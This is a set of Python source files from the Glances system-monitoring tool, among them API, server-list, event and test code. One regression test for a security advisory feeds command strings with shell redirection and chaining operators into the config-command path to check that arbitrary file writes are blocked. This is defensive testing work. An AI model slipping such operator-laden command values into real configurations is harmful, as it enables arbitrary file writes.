                logger.debug(f"Export {name} stats to InfluxDB")



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Issue interface class."""

import os
import platform
import pprint
import sys
import time

import psutil

import glances
from glances import __version__, psutil_version
from glances.timer import Counter

TERMINAL_WIDTH = 79


class colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    ORANGE = '\033[93m'
    BLUE = '\033[94m'
    NO = '\033[0m'

    def disable(self):
        self.RED = ''
        self.GREEN = ''
        self.BLUE = ''
        self.ORANGE = ''
        self.NO = ''


class GlancesStdoutIssue:
    """This class manages the Issue display."""

    def __init__(self, config=None, args=None):
        # Init
        self.config = config
        self.args = args

    def end(self):
        pass

    def print_version(self):
        sys.stdout.write('=' * TERMINAL_WIDTH + '\n')
        sys.stdout.write(f'Glances {colors.BLUE + __version__ + colors.NO} ({os.path.realpath(glances.__file__)})\n')
        sys.stdout.write(f'Python {colors.BLUE + platform.python_version() + colors.NO} ({sys.executable})\n')
        sys.stdout.write(f'PsUtil {colors.BLUE + psutil_version + colors.NO} ({os.path.realpath(psutil.__file__)})\n')
        sys.stdout.write('=' * TERMINAL_WIDTH + '\n')
        sys.stdout.flush()

    def print_issue(self, plugin, result, message):
        sys.stdout.write(f'{colors.BLUE + plugin}{result}{message}')
        sys.stdout.write(colors.NO + '\n')
        sys.stdout.flush()

    def update(self, stats, duration=3):
        """Display issue"""
        self.print_version()

        for plugin in sorted(stats._plugins):
            if stats._plugins[plugin].is_disabled():
                continue
            try:
                # Update the stats
                stats._plugins[plugin].update()
            except Exception:
                pass

        time.sleep(2)

        counter_total = Counter()
        plugin_timings = []
        for plugin in sorted(stats._plugins):
            if stats._plugins[plugin].is_disabled():
                # If current plugin is disable
                # then continue to next plugin
                result = colors.NO + '[NA]'.rjust(18 - len(plugin))
                message = colors.NO
                self.print_issue(plugin, result, message)
                continue
            # Start the counter
            counter = Counter()
            counter.reset()
            stat = None
            stat_error = None
            try:
                # Update the stats
                stats._plugins[plugin].update()
                # Get the stats
                stat = stats.get_plugin(plugin).get_export()
                # Hide private information
                if plugin == 'ip':
                    for key in stat:
                        stat[key] = '***'
            except Exception as e:
                stat_error = e
            elapsed = counter.get()
            if stat_error is None:
                result = (colors.GREEN + '[OK]   ' + colors.BLUE + f' {elapsed:.5f}s ').rjust(41 - len(plugin))
                if isinstance(stat, list) and len(stat) > 0 and 'key' in stat[0]:
                    key = 'key={} '.format(stat[0]['key'])
                    stat_output = pprint.pformat([stat[0]], compact=True, width=120, depth=3)
                    message = colors.ORANGE + key + colors.NO + '\n' + stat_output[0:-1] + ', ...' + stat_output[-1]
                else:
                    message = '\n' + colors.NO + pprint.pformat(stat, compact=True, width=120, depth=2)
            else:
                result = (colors.RED + '[ERROR]' + colors.BLUE + f' {elapsed:.5f}s ').rjust(41 - len(plugin))
                message = colors.NO + str(stat_error)[0 : TERMINAL_WIDTH - 41]

            # Record timing for the summary table
            plugin_timings.append((plugin, elapsed))

            # Display the result
            self.print_issue(plugin, result, message)

        # Display total time need to update all plugins
        sys.stdout.write('=' * TERMINAL_WIDTH + '\n')
        print(f"Total time to update all stats: {colors.BLUE}{counter_total.get():.5f}s{colors.NO}")
        sys.stdout.write('=' * TERMINAL_WIDTH + '\n')

        # Display top 10 slowest plugins
        top_n = 10
        slowest = sorted(plugin_timings, key=lambda x: x[1], reverse=True)[:top_n]
        if slowest:
            sys.stdout.write(f'\nTop {top_n} slowest plugins:\n')
            sys.stdout.write('-' * TERMINAL_WIDTH + '\n')
            for rank, (plugin, elapsed) in enumerate(slowest, start=1):
                sys.stdout.write(
                    f'{rank:>2}. {colors.BLUE}{plugin:<20}{colors.NO} {colors.ORANGE}{elapsed:.5f}s{colors.NO}\n'
                )
            sys.stdout.write('=' * TERMINAL_WIDTH + '\n')

        # Return True to exit directly (no refresh)
        return True



#
# Glances - An eye on your system
#
# SPDX-FileCopyrightText: 2025 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

from glances import __version__ as glances_version
from glances.globals import auto_unit, weak_lru_cache
from glances.main import GlancesMain
from glances.outputs.glances_bars import Bar
from glances.processes import sort_stats
from glances.stats import GlancesStats

plugin_dependencies_tree = {
    'processlist': ['processcount'],
}


class GlancesAPI:
    ttl = 2.0  # Default cache TTL in seconds

    def __init__(self, config=None, args=None):
        self.__version__ = glances_version.split('.')[0]  # Get the major version

        core = GlancesMain()
        self.args = args if args is not None else core.get_args()
        self.config = config if config is not None else core.get_config()
        self._stats = GlancesStats(config=self.config, args=self.args)

        # Set the cache TTL for the API
        self.ttl = self.args.time if self.args.time is not None else self.ttl

        # Init the stats of all plugins in order to ensure that rate are computed
        self._stats.update()

    @weak_lru_cache(maxsize=1, ttl=ttl)
    def __getattr__(self, item):
        """Fallback to the stats object for any missing attributes."""
        if item in self._stats.getPluginsList():
            if item in plugin_dependencies_tree:
                # Ensure dependencies are updated before accessing the plugin
                for dependency in plugin_dependencies_tree[item]:
                    self._stats.get_plugin(dependency).update()
            # Update the plugin stats
            self._stats.get_plugin(item).update()
            return self._stats.get_plugin(item)
        raise AttributeError(f"'{self.__class__.__name__}' object has no attribute '{item}'")

    def plugins(self):
        """Return the list of available plugins."""
        return self._stats.getPluginsList()

    def auto_unit(self, number, low_precision=False, min_symbol='K', none_symbol='-'):
        """
        Converts a numeric value into a human-readable string with appropriate units.

        Args:
            number (float or int): The numeric value to be converted.
            low_precision (bool, optional): If True, use lower precision for the output. Defaults to False.
            min_symbol (str, optional): The minimum unit symbol to use (e.g., 'K' for kilo). Defaults to 'K'.
            none_symbol (str, optional): The symbol to display if the number is None. Defaults to '-'.

        Returns:
            str: A human-readable string representation of the number with units.
        """
        return auto_unit(number, low_precision, min_symbol, none_symbol)

    def bar(self, value, size=18, bar_char='■', empty_char='□', pre_char='', post_char=''):
        """
        Generate a progress bar representation for a given value.

        Args:
            value (float): The percentage value to represent in the bar (typically between 0 and 100).
            size (int, optional): The total length of the bar in characters. Defaults to 18.
            bar_char (str, optional): The character used to represent the filled portion of the bar. Defaults to '■'.
            empty_char (str, optional): The character used to represent the empty portion of the bar. Defaults to '□'.
            pre_char (str, optional): A string to prepend to the bar. Defaults to ''.
            post_char (str, optional): A string to append to the bar. Defaults to ''.

        Returns:
            str: A string representing the progress bar.
        """
        b = Bar(
            size, bar_char=bar_char, empty_char=empty_char, pre_char=pre_char, post_char=post_char, display_value=False
        )
        b.percent = value
        return b.get()

    def top_process(self, limit=3, sorted_by='cpu_percent', sorted_by_secondary='memory_percent'):
        """
        Returns a list of the top processes sorted by specified criteria.

        Args:
            limit (int, optional): The maximum number of top processes to return. Defaults to 3.
            sorted_by (str, optional): The primary key to sort processes by (e.g., 'cpu_percent').
                                       Defaults to 'cpu_percent'.
            sorted_by_secondary (str, optional): The secondary key to sort processes by if primary keys are equal
                                                 (e.g., 'memory_percent'). Defaults to 'memory_percent'.

        Returns:
            list: A list of dictionaries representing the top processes, excluding those with 'glances' in their
                  command line.

        Note:
            The 'glances' process is excluded from the returned list to avoid self-generated CPU load affecting
            the results.
        """
        # Exclude glances process from the top list
        # because in fetch mode, Glances generate a CPU load
        all_but_glances = [
            p
            for p in self._stats.get_plugin('processlist').get_raw()
            if p['cmdline'] and 'glances' not in (p['cmdline'] or ())
        ]
        return sort_stats(all_but_glances, sorted_by=sorted_by, sorted_by_secondary=sorted_by_secondary)[:limit]



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Manage the servers list used in TUI and WEBUI Central Browser mode"""

import threading

from defusedxml import xmlrpc

from glances import __apiversion__
from glances.client import GlancesClientTransport
from glances.globals import json_loads
from glances.logger import logger
from glances.password_list import GlancesPasswordList as GlancesPassword
from glances.servers_list_dynamic import GlancesAutoDiscoverServer
from glances.servers_list_static import GlancesStaticServer

try:
    import requests
except ImportError as e:
    import_requests_error_tag = True
    # Display debug message if import error
    logger.warning(f"Missing Python Lib ({e}), Client browser will not grab stats from Glances REST server")
else:
    import_requests_error_tag = False

# Correct issue #1025 by monkey path the xmlrpc lib
xmlrpc.monkey_patch()

DEFAULT_COLUMNS = "system:hr_name,load:min5,cpu:total,mem:percent"


class GlancesServersList:
    _section = "serverlist"

    def __init__(self, config=None, args=None):
        # Store the arg/config
        self.args = args
        self.config = config

        # Init the servers and passwords list defined in the Glances configuration file
        self.static_server = None
        self.password = None
        self.load()

        # Init the dynamic servers list by starting a Zeroconf listener
        self.autodiscover_server = None
        if self.args.browser or not self.args.disable_autodiscover:
            self.autodiscover_server = GlancesAutoDiscoverServer()

        # Stats are updated in thread
        # Create a dict of threads
        self.threads_list = {}

    def load(self):
        """Load server and password list from the configuration file."""
        # Init the static server list
        self.static_server = GlancesStaticServer(config=self.config)
        # Init the password list (if defined)
        self.password = GlancesPassword(config=self.config)
        # Load columns to grab/display
        self._columns = self.load_columns()

    def load_columns(self):
        """Load columns definition from the configuration file.
        Read:   'system:hr_name,load:min5,cpu:total,mem:percent,sensors:value:Ambient'
        Return: [{'plugin': 'system', 'field': 'hr_name'},
                 {'plugin': 'load', 'field': 'min5'},
                 {'plugin': 'cpu', 'field': 'total'},
                 {'plugin': 'mem', 'field': 'percent'},
                 {'plugin': 'sensors', 'field': 'value', 'key': 'Ambient'}]
        """
        if self.config is None:
            logger.debug("No configuration file available. Cannot load columns definition.")
        elif not self.config.has_section(self._section):
            logger.warning(f"No [{self._section}] section in the configuration file. Cannot load columns definition.")

        columns_def = (
            self.config.get_value(self._section, 'columns')
            if self.config.get_value(self._section, 'columns')
            else DEFAULT_COLUMNS
        )

        return [dict(zip(['plugin', 'field', 'key'], i.split(':'))) for i in columns_def.split(',')]

    def get_servers_list(self):
        """Return the current server list (list of dict).

        Merge of static + autodiscover servers list.
        """
        ret = []

        if self.args.browser:
            ret = self.static_server.get_servers_list()
            if self.autodiscover_server is not None:
                ret = self.static_server.get_servers_list() + self.autodiscover_server.get_servers_list()

        return ret

    def get_columns(self):
        """Return the columns definitions"""
        return self._columns

    def update_servers_stats(self):
        """For each server in the servers list, update the stats"""
        for v in self.get_servers_list():
            key = v["key"]
            thread = self.threads_list.get(key, None)
            if thread is None or thread.is_alive() is False:
                thread = threading.Thread(target=self.__update_stats, args=[v])
                self.threads_list[key] = thread
                thread.start()

    @staticmethod
    def _get_connect_host(server):
        """Return the host to use for connecting to the server.

        For dynamic (Zeroconf) servers, use the discovered IP address
        instead of the untrusted advertised name.
        """
        if server.get('type') == 'DYNAMIC':
            return server['ip']
        return server['name']

    def _get_preconfigured_password(self, server):
        """Return the preconfigured password for the server.

        Dynamic (Zeroconf) entries are untrusted and should not inherit
        saved or default credentials to prevent credential exfiltration
        via fake Zeroconf services.
        """
        if server.get('type') == 'DYNAMIC':
            return None
        return self.password.get_password(server['name'])

    def get_uri(self, server):
        """Return the URI for the given server dict."""
        host = self._get_connect_host(server)
        # Select the connection mode (with or without password)
        if server['password'] != "":
            if server['status'] == 'PROTECTED':
                # Try with the preconfigured password (only if status is PROTECTED)
                clear_password = self._get_preconfigured_password(server)
                if clear_password is not None:
                    server['password'] = self.password.get_hash(clear_password)
            uri = 'http://{}:{}@{}:{}'.format(server['username'], server['password'], host, server['port'])
        else:
            uri = 'http://{}:{}'.format(host, server['port'])
        return uri

    def set_in_selected(self, selected, key, value):
        """Set the (key, value) for the selected server in the list."""
        # Static list then dynamic one
        if selected >= len(self.static_server.get_servers_list()):
            self.autodiscover_server.set_server(selected - len(self.static_server.get_servers_list()), key, value)
        else:
            self.static_server.set_server(selected, key, value)

    def __update_stats(self, server):
        """Update stats for the given server"""
        server['uri'] = self.get_uri(server)
        server['columns'] = [self.__get_key(column) for column in self.get_columns()]
        if server['protocol'].lower() == 'rpc':
            self.__update_stats_rpc(server['uri'], server)
        elif server['protocol'].lower() == 'rest' and not import_requests_error_tag:
            self.__update_stats_rest(f"{server['uri']}/api/{__apiversion__}", server)

        return server

    def __update_stats_rpc(self, uri, server):
        # Try to connect to the server
        t = GlancesClientTransport()
        t.set_timeout(3)

        # Get common stats from Glances server
        try:
            s = xmlrpc.xmlrpc_client.ServerProxy(uri, transport=t)
        except Exception as e:
            logger.warning(f"Client browser couldn't create socket ({e})")
            return server

        # Get the stats
        for column in self.get_columns():
            server_key = self.__get_key(column)
            try:
                # Value
                v_json = json_loads(s.getPlugin(column['plugin']))
                if 'key' in column:
                    v_json = [i for i in v_json if i[i['key']].lower() == column['key'].lower()][0]
                server[server_key] = v_json[column['field']]
                # Decoration
                d_json = json_loads(s.getPluginView(column['plugin']))
                if 'key' in column:
                    d_json = d_json.get(column['key'])
                server[server_key + '_decoration'] = d_json[column['field']]['decoration']
            except (KeyError, IndexError, xmlrpc.xmlrpc_client.Fault) as e:
                logger.debug(f"Error while grabbing stats form server ({e})")
            except OSError as e:
                logger.debug(f"Error while grabbing stats form server ({e})")
                server['status'] = 'OFFLINE'
            except xmlrpc.xmlrpc_client.ProtocolError as e:
                if e.errcode == 401:
                    # Error 401 (Authentication failed)
                    # Password is not the good one...
                    server['password'] = None
                    server['status'] = 'PROTECTED'
                else:
                    server['status'] = 'OFFLINE'
                logger.debug(f"Cannot grab stats from server ({e.errcode} {e.errmsg})")
            else:
                # Status
                server['status'] = 'ONLINE'

        return server

    def __update_stats_rest(self, uri, server):
        try:
            requests.get(f'{uri}/status', timeout=3)
        except requests.exceptions.RequestException as e:
            logger.debug(f"Error while grabbing stats form server ({e})")
            server['status'] = 'OFFLINE'
            return server
        else:
            server['status'] = 'ONLINE'

        for column in self.get_columns():
            server_key = self.__get_key(column)
            # Build the URI (URL encoded)
            request_uri = f"{column['plugin']}/{column['field']}"
            if 'key' in column:
                request_uri += f"/{column['key']}"
            request_uri = f'{uri}/' + requests.utils.quote(request_uri)
            # Value
            try:
                r = requests.get(request_uri, timeout=3)
            except requests.exceptions.RequestException as e:
                logger.debug(f"Error while grabbing stats form server ({e})")
            else:
                if r.json() and column['field'] in r.json():
                    server[server_key] = r.json()[column['field']]
            # Decoration
            try:
                d = requests.get(request_uri + '/views', timeout=3)
            except requests.exceptions.RequestException as e:
                logger.debug(f"Error while grabbing stats view form server ({e})")
            else:
                if d.json() and 'decoration' in d.json():
                    server[server_key + '_decoration'] = d.json()['decoration']

        return server

    def __get_key(self, column):
        server_key = column.get('plugin')
        if 'field' in column:
            server_key += '_' + column.get('field')
        if 'key' in column:
            server_key += '_' + column.get('key')
        return server_key



import asyncio

import nats


async def main():
    nc = nats.NATS()

    await nc.connect(servers=["nats://localhost:4222"])

    await nc.publish("glances.test", b'A test')
    await nc.flush()


if __name__ == '__main__':
    asyncio.run(main())

# To run this test script, make sure you have a NATS server running locally.



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2026 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Regression tests for GHSA-3vwc-qwhc-3mj7.

AMP `command` / `service_cmd` values are loaded verbatim from glances.conf and
passed to secure_popen(), which interprets the shell operators '&&', '|' and
'>'. The '>' operator allows arbitrary file writes.

These tests verify that:
- secure_popen(allow_operators=False) never interprets these operators, and
- the AMP path disables operator interpretation when --disable-config-exec is
  set, while keeping the historical (operator-enabled) behaviour by default.
"""

import os
import tempfile
from argparse import Namespace

from glances.amps.default import Amp as DefaultAmp
from glances.secure import secure_popen


def _make_amp(command, disable_config_exec):
    args = Namespace(disable_config_exec=disable_config_exec)
    amp = DefaultAmp(name='poc', args=args)
    amp.configs = {'enable': 'true', 'refresh': '3', 'command': command}
    return amp


# ---------------------------------------------------------------------------
# secure_popen(allow_operators=False)
# ---------------------------------------------------------------------------


class TestSecurePopenNoOperators:
    """When operators are disallowed, '&&', '|' and '>' are literal arguments."""

    def test_redirect_does_not_write_file(self):
        with tempfile.NamedTemporaryFile(mode='r', suffix='.txt', delete=True) as f:
            tmpfile = f.name
        # The temp file is now removed; secure_popen must NOT recreate it.
        assert not os.path.exists(tmpfile)
        result = secure_popen(f'echo -n HELLO > {tmpfile}', allow_operators=False)
        assert not os.path.exists(tmpfile), 'redirection must not write a file'
        # '>' and the path are echoed back as plain arguments.
        assert '>' in result and tmpfile in result

    def test_chaining_is_not_interpreted(self):
        result = secure_popen('echo -n A && echo -n B', allow_operators=False)
        assert result != 'AB', '&& must not chain commands'
        assert '&&' in result

    def test_pipe_is_not_interpreted(self):
        result = secure_popen('echo PIPED | grep PIPED', allow_operators=False)
        assert '|' in result, '| must not pipe between processes'


# ---------------------------------------------------------------------------
# AMP path gated by --disable-config-exec
# ---------------------------------------------------------------------------


class TestAmpRedirectMitigation:
    """Default AMP must honour --disable-config-exec for command operators."""

    def test_disable_config_exec_blocks_file_write(self):
        with tempfile.NamedTemporaryFile(mode='r', suffix='.txt', delete=True) as f:
            marker = f.name
        assert not os.path.exists(marker)
        amp = _make_amp(f'echo POC_ARBITRARY_FILE_WRITE > {marker}', disable_config_exec=True)
        amp.update([])
        assert not os.path.exists(marker), 'AMP must not write arbitrary files when hardened'

    def test_default_behaviour_unchanged(self):
        """Non-regression: without the flag the operator still works as before."""
        with tempfile.NamedTemporaryFile(mode='r', suffix='.txt', delete=True) as f:
            marker = f.name
        assert not os.path.exists(marker)
        amp = _make_amp(f'echo -n LEGIT > {marker}', disable_config_exec=False)
        try:
            amp.update([])
            assert os.path.exists(marker), 'default operator behaviour must be preserved'
            with open(marker) as fh:
                assert fh.read() == 'LEGIT'
        finally:
            if os.path.exists(marker):
                os.unlink(marker)



#!/usr/bin/env python
#
# Glances - An eye on your system
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Glances unitary tests suite for Glances memory leak."""

import time
import tracemalloc


def test_memoryleak_no_history(glances_stats_no_history, logger):
    """
    Test Glances memory leak.
    """
    tracemalloc.start()
    # First iterations just to init the stats and fill the memory
    logger.info('Please wait during memory leak test initialisation')
    iteration = 3
    for _ in range(iteration):
        glances_stats_no_history.update()
        time.sleep(1)

    # Then iteration to measure memory leak
    logger.info('Please wait during memory leak test')
    iteration = 10
    snapshot_begin = tracemalloc.take_snapshot()
    for _ in range(iteration):
        glances_stats_no_history.update()
        time.sleep(1)
    snapshot_end = tracemalloc.take_snapshot()
    snapshot_diff = snapshot_end.compare_to(snapshot_begin, 'filename')
    memory_leak = sum([s.size_diff for s in snapshot_diff]) // iteration
    logger.info(f'Memory consume per iteration: {memory_leak} bytes')
    assert memory_leak < 15000, f'Memory leak: {memory_leak} bytes'



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2022 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Manage Glances events list (previously Glances logs in Glances < 3.1)."""

import time
from dataclasses import asdict
from datetime import datetime

from glances.event import GlancesEvent
from glances.processes import glances_processes
from glances.thresholds import glances_thresholds

# Static decision tree for the global alert message
# - msg: Message to be displayed (result of the decision tree)
# - thresholds: a list of stats to take into account
# - thresholds_min: minimal value of the thresholds sum
# -                 0: OK
# -                 1: CAREFUL
# -                 2: WARNING
# -                 3: CRITICAL
tree = [
    {'msg': 'EVENTS history', 'thresholds': [], 'thresholds_min': 0},
    {'msg': 'High CPU user mode', 'thresholds': ['cpu_user'], 'thresholds_min': 2},
    {'msg': 'High CPU kernel usage', 'thresholds': ['cpu_system'], 'thresholds_min': 2},
    {'msg': 'High CPU I/O waiting', 'thresholds': ['cpu_iowait'], 'thresholds_min': 2},
    {
        'msg': 'Large CPU stolen time. System running the hypervisor is too busy.',
        'thresholds': ['cpu_steal'],
        'thresholds_min': 2,
    },
    {'msg': 'High CPU niced value', 'thresholds': ['cpu_niced'], 'thresholds_min': 2},
    {'msg': 'System overloaded in the last 5 minutes', 'thresholds': ['load'], 'thresholds_min': 2},
    {'msg': 'High swap (paging) usage', 'thresholds': ['memswap'], 'thresholds_min': 2},
    {'msg': 'High memory consumption', 'thresholds': ['mem'], 'thresholds_min': 2},
]

# TODO: change the algo to use the following decision tree
# Source: Inspire by https://scoutapm.com/blog/slow_server_flow_chart
# _yes means threshold >= 2
# _no  means threshold < 2
# With threshold:
# - 0: OK
# - 1: CAREFUL
# - 2: WARNING
# - 3: CRITICAL
tree_new = {
    'cpu_iowait': {
        '_yes': {
            'memswap': {
                '_yes': {
                    'mem': {
                        '_yes': {
                            # Once you've identified the offenders, the resolution will again
                            # depend on whether their memory usage seems business-as-usual or not.
                            # For example, a memory leak can be satisfactorily addressed by a one-time
                            # or periodic restart of the process.
                            # - if memory usage seems anomalous: kill the offending processes.
                            # - if memory usage seems business-as-usual: add RAM to the server,
                            # or split high-memory using services to other servers.
                            '_msg': "Memory issue"
                        },
                        '_no': {
                            # ???
                            '_msg': "Swap issue"
                        },
                    }
                },
                '_no': {
                    # Low swap means you have a "real" IO wait problem. The next step is to see what's hogging your IO.
                    # iotop is an awesome tool for identifying io offenders. Two things to note:
                    # unless you've already installed iotop, it's probably not already on your system.
                    # Recommendation: install it before you need it - - it's no fun trying to install a troubleshooting
                    # tool on an overloaded machine (iotop requires a Linux of 2.62 or above)
                    '_msg': "I/O issue"
                },
            }
        },
        '_no': {
            'cpu_total': {
                '_yes': {
                    'cpu_user': {
                        '_yes': {
                            # We expect the user-time percentage to be high.
                            # There's most likely a program or service you've configured on you server that's
                            # hogging CPU.
                            # Checking the % user time just confirms this. When you see that the % user-time is high,
                            # it's time to see what executable is monopolizing the CPU
                            # Once you've confirmed that the % usertime is high, check the process list(also provided
                            # by top).
                            # Be default, top sorts the process list by % CPU, so you can just look at the top process
                            # or processes.
                            # If there's a single process hogging the CPU in a way that seems abnormal, it's an
                            # anomalous situation
                            # that a service restart can fix. If there are are multiple processes taking up CPU
                            # resources, or it
                            # there's one process that takes lots of resources while otherwise functioning normally,
                            # than your setup
                            # may just be underpowered. You'll need to upgrade your server(add more cores),
                            # or split services out onto
                            # other boxes. In either case, you have a resolution:
                            # - if situation seems anomalous: kill the offending processes.
                            # - if situation seems typical given history: upgrade server or add more servers.
                            '_msg': "CPU issue with user process(es)"
                        },
                        '_no': {
                            'cpu_steal': {
                                '_yes': {
                                    '_msg': "CPU issue with stolen time. System running the hypervisor may be too busy."
                                },
                                '_no': {'_msg': "CPU issue with system process(es)"},
                            }
                        },
                    }
                },
                '_no': {
                    '_yes': {
                        # ???
                        '_msg': "Memory issue"
                    },
                    '_no': {
                        # Your slowness isn't due to CPU or IO problems, so it's likely an application-specific issue.
                        # It's also possible that the slowness is being caused by another server in your cluster, or
                        # by an external service you rely on.
                        # start by checking important applications for uncharacteristic slowness(the DB is a good place
                        # to start), think through which parts of your infrastructure could be slowed down externally.
                        # For example, do you use an externally hosted email service that could slow down critical
                        # parts of your application ?
                        # If you suspect another server in your cluster, strace and lsof can provide information on
                        # what the process is doing or waiting on. Strace will show you which file descriptors are
                        # being read or written to (or being attempted to be read from) and lsof can give you a
                        # mapping of those file descriptors to network connections.
                        '_msg': "External issue"
                    },
                },
            }
        },
    }
}


def build_global_message():
    """Parse the decision tree and return the message.

    Note: message corresponding to the current thresholds values
    """
    # Compute the weight for each item in the tree
    current_thresholds = glances_thresholds.get()
    for i in tree:
        i['weight'] = sum([current_thresholds[t].value() for t in i['thresholds'] if t in current_thresholds])
    themax = max(tree, key=lambda d: d['weight'])
    if themax['weight'] >= themax['thresholds_min']:
        # Check if the weight is > to the minimal threshold value
        return themax['msg']
    return tree[0]['msg']


class GlancesEventsList:
    """This class manages events inside the Glances software.
    GlancesEventsList is a list of GlancesEvent.
    GlancesEvent is defined in the event.py file
    """

    def __init__(self, max_events=10, min_duration=6, min_interval=6):
        """Init the events class.

        max_events: maximum size of the events list
        min_duration: events duration should be > min_duration to be taken into account (in seconds)
        min_interval: minimal interval between same kind of alert (in seconds)
        """
        # Maximum size of the events list
        self.set_max_events(max_events)

        # Minimal event duraton time (in seconds)
        self.set_min_duration(min_duration)

        # Minimal interval between same kind of alert (in seconds)
        self.set_min_interval(min_interval)

        # Init the logs list
        self.events_list = []

    def set_max_events(self, max_events):
        """Set the maximum size of the events list."""
        self.max_events = max_events

    def set_min_duration(self, min_duration):
        """Set the minimal event duration time (in seconds)."""
        self.min_duration = min_duration

    def set_min_interval(self, min_interval):
        """Set the minimum interval between same kind of alert (in seconds)."""
        self.min_interval = min_interval

    def get(self):
        """Return the RAW events list."""
        return [asdict(e) for e in self.events_list]

    def len(self):
        """Return the number of events in the logs list."""
        return self.events_list.__len__()

    def __event_exist(self, event_time, event_type):
        """Return the event position in the events list if:
        type is matching
        and (end is < 0 or event_time - end < min_interval)
        Return -1 if the item is not found.
        """
        for i in range(self.len()):
            if (
                self.events_list[i].is_ongoing() or (event_time - self.events_list[i].end < self.min_interval)
            ) and self.events_list[i].type == event_type:
                return i
        return -1

    def get_event_sort_key(self, event_type):
        """Return the process sort key"""
        # Process sort depending on alert type
        if event_type.startswith("MEM"):
            # Sort TOP process by memory_percent
            ret = 'memory_percent'
        elif event_type.startswith("CPU_IOWAIT"):
            # Sort TOP process by io_counters (only for Linux OS)
            ret = 'io_counters'
        else:
            # Default sort is...
            ret = 'cpu_percent'
        return ret

    def set_process_sort(self, event_type):
        """Define the process auto sort key from the alert type."""
        if glances_processes.auto_sort:
            glances_processes.set_sort_key(self.get_event_sort_key(event_type))

    def reset_process_sort(self):
        """Reset the process auto sort key."""
        if glances_processes.auto_sort:
            glances_processes.set_sort_key('auto')

    def add(self, event_state, event_type, event_value, proc_list=None, proc_desc=""):
        """Add a new item to the logs list.

        event_state = "OK|CAREFUL|WARNING|CRITICAL"
        event_type = "CPU|LOAD|MEM|..."
        event_value = value
        proc_list = list of processes
        proc_desc = processes description
        global_message = global alert message

        If 'event' is a 'new one', add it at the beginning of the list.
        If 'event' is not a 'new one', update the list .
        When finished if event duration < peak_time then the alert is not set.
        """
        event_time = time.mktime(datetime.now().timetuple())
        global_message = build_global_message()
        proc_list = proc_list or glances_processes.get_list()

        # Add or update the log
        event_index = self.__event_exist(event_time, event_type)
        if event_index < 0:
            # Event did not exist, add it
            self._create_event(event_time, event_state, event_type, event_value, proc_desc, global_message)
        else:
            # Event exist, update it
            self._update_event(
                event_time, event_index, event_state, event_type, event_value, proc_list, proc_desc, global_message
            )

        # logger.info(self.events_list)
        return self.len()

    def _create_event(self, event_time, event_state, event_type, event_value, proc_desc, global_message):
        """Add a new item in the log list.

        Item is added only if the criticality (event_state) is WARNING or CRITICAL.
        """
        if event_state not in ('WARNING', 'CRITICAL'):
            return

        # Define the automatic process sort key
        self.set_process_sort(event_type)

        # Create the new log item
        # Time is stored in Epoch format
        # Epoch -> DMYHMS = datetime.fromtimestamp(epoch)
        event = GlancesEvent(
            begin=event_time,
            state=event_state,
            type=event_type,
            min=event_value,
            max=event_value,
            sum=event_value,
            count=1,
            avg=event_value,
            top=[],
            desc=proc_desc,
            sort=glances_processes.sort_key,
            global_msg=global_message,
        )

        # Add the event to the list
        self.events_list.insert(0, event)

        # Limit the list to 'max_events' items
        if self.len() > self.max_events:
            self.events_list.pop()

    def _update_event(
        self, event_time, event_index, event_state, event_type, event_value, proc_list, proc_desc, global_message
    ):
        """Update an event in the list"""
        if event_state in ('OK', 'CAREFUL') and self.events_list[event_index].is_ongoing():
            # Close the event
            self._close_event(event_time, event_index)
        elif event_state in ('OK', 'CAREFUL') and self.events_list[event_index].is_finished():
            # Event is already closed, do nothing
            pass
        else:  # event_state == "WARNING" or event_state == "CRITICAL"
            # Set process sort key
            self.set_process_sort(event_type)

            # Update an ongoing event
            self.events_list[event_index].update(
                state=event_state,
                value=event_value,
                sort_key=self.get_event_sort_key(event_type),
                proc_list=proc_list,
                proc_desc=proc_desc,
                global_msg=global_message,
            )

    def _close_event(self, event_time, event_index):
        """Close an event in the list"""
        # Reset the automatic process sort key
        self.reset_process_sort()

        # Set the end of the events
        if event_time - self.events_list[event_index].begin >= self.min_duration:
            # If event is >= min_duration seconds
            self.events_list[event_index].end = event_time
        else:
            # If event < min_duration seconds, ignore
            self.events_list.remove(self.events_list[event_index])

    def clean(self, critical=False):
        """Clean the logs list by deleting finished items.

        By default, only delete WARNING message.
        If critical = True, also delete CRITICAL message.
        """
        # Create a new clean list
        clean_events_list = []
        while self.len() > 0:
            event = self.events_list.pop()
            if event.end < 0 or (not critical and event.state.startswith("CRITICAL")):
                clean_events_list.insert(0, event)
        # The list is now the clean one
        self.events_list = clean_events_list
        return self.len()


glances_events = GlancesEventsList()
